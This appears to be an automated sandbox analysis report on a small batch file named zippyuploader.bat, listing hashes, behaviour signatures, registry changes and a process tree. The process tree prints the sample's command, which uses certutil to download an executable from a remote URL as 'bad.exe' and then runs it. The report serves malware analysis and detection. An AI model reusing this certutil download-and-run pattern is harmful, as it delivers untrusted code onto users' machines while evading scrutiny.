Analysis
-
max time kernel
322s -
max time network
1580s -
platform
windows10_x64 -
resource
win10-20220223-en -
submitted
21-03-2022 16:55
Static task
static1
Behavioral task
behavioral1
Sample
zippyuploader.bat
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
zippyuploader.bat
Resource
win10-20220223-en
Behavioral task
behavioral3
Sample
zippyuploader.bat
Resource
win10v2004-20220310-en
General
-
Target
zippyuploader.bat
-
Size
107B
-
MD5
0fac231074f90878c2283b2561ed906c
-
SHA1
2c3421f0a6c20b8c6fb07ffe62526438a5169194
-
SHA256
acfd8e0557e2efc01d981221e5e5e0fcd68f7231a72d3d46361294d9df43d984
-
SHA512
fdc5f227244f4e0a76356aba17e38823e0e9bb0ffc344ce07b6bc9282c7192c08a9cbd42d157d13be0c378c9678aec4ea1ea6c7d663d21e732a73a2ceb6159b9
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
bad.exepid process 3064 bad.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\bad.exe upx C:\Users\Admin\AppData\Local\Temp\bad.exe upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 33 IoCs
Processes:
bad.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" bad.exe Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU bad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff bad.exe Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" bad.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" bad.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 bad.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance bad.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
bad.exepid process 3064 bad.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
bad.exepid process 3064 bad.exe 3064 bad.exe 3064 bad.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
bad.exepid process 3064 bad.exe 3064 bad.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
bad.exepid process 3064 bad.exe 3064 bad.exe 3064 bad.exe 3064 bad.exe 3064 bad.exe 3064 bad.exe 3064 bad.exe 3064 bad.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exedescription pid process target process PID 3584 wrote to memory of 3896 3584 cmd.exe certutil.exe PID 3584 wrote to memory of 3896 3584 cmd.exe certutil.exe PID 3584 wrote to memory of 3064 3584 cmd.exe bad.exe PID 3584 wrote to memory of 3064 3584 cmd.exe bad.exe PID 3584 wrote to memory of 3064 3584 cmd.exe bad.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\certutil.execertutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe2⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\bad.exebad.exe2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3064
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3680
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ed323324bff4fbe54be6040ef429862c
SHA12182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA25688184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA51272511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b
-
MD5
ed323324bff4fbe54be6040ef429862c
SHA12182d6953bc33050d44ca585ca3e6e64cd0a6864
SHA25688184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442
SHA51272511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b